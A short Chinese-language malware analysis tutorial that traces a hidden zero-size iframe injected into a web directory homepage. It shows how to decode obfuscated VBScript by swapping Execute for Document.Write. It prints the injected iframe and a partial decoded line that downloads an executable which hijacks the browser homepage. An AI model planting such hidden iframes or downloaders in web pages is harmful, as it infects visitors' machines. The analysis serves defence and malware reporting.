提醒:分析病毒存在一定風(fēng)險(xiǎn),建議在虛擬機(jī)下操作。
第一步 查看病毒網(wǎng)站首頁(yè)的源代碼,可以發(fā)現(xiàn)在尾部有如下的字樣:
<iframe src=http://m.dashow.com.cn/m.html width=0 height=0></iframe>
這是一個(gè)嵌入到7b網(wǎng)址之家首頁(yè)的頁(yè)面,即打開(kāi)網(wǎng)站也就同時(shí)打開(kāi)了這個(gè)頁(yè)面。
而“http://m.dashow.com.cn/m.html”表示的是一個(gè)字符串,“&#”后面是每個(gè)字符串ASCII的十進(jìn)制值。
直接把這段亂碼保存為HTM文件,用IE打開(kāi),就可以看到它的真實(shí)面目“http : // m.dashow.com.cn / m.html”。
第二步 查看http : // m.dashow.com.cn / m.html的源代碼,把看的<scrtipt>腳本段中的Execute替換為Document.Write,然后打開(kāi)這個(gè)HTM頁(yè)面,就會(huì)出現(xiàn)一段代碼,同樣地,把EXECUTE換成我們無(wú)敵的Document.Write,前后加腳本標(biāo)記,存HTM打開(kāi)。屏幕上立即出現(xiàn)了一段令人眼花的東西。把眼花繚亂的東西整理一下,并將出現(xiàn)的CHR()在前面用到過(guò),作用是把字符的ASCII轉(zhuǎn)成字符,只不過(guò)這次是16進(jìn)制。然后再將字符拼接成字符串,然后再Execute運(yùn)行這個(gè)命令字符串。繼續(xù)用Document.Write替換掉EXECUTE,前后加腳本標(biāo)記,存HTM打開(kāi)。
第三步 經(jīng)過(guò)上幾步的還原后終于看到了這個(gè)惡意頁(yè)面的最終面目。
on error resume next curl = "http : // m.dashow.com.cn / start.exe"……其后省略。
這段代碼中我們可以很清楚地看到http : // m.dashow.com.cn / start.exe這個(gè)鏈接。沒(méi)錯(cuò),它就是運(yùn)行后可以將用戶主頁(yè)鎖定為網(wǎng)站的病毒。
可以用下載工具將這個(gè)文件下載下來(lái),如果你的殺毒軟件查不到的話最好立即上報(bào)。這樣可以保證殺毒軟件快速查殺這個(gè)病毒,并使更少的網(wǎng)友免受該病毒的侵害。
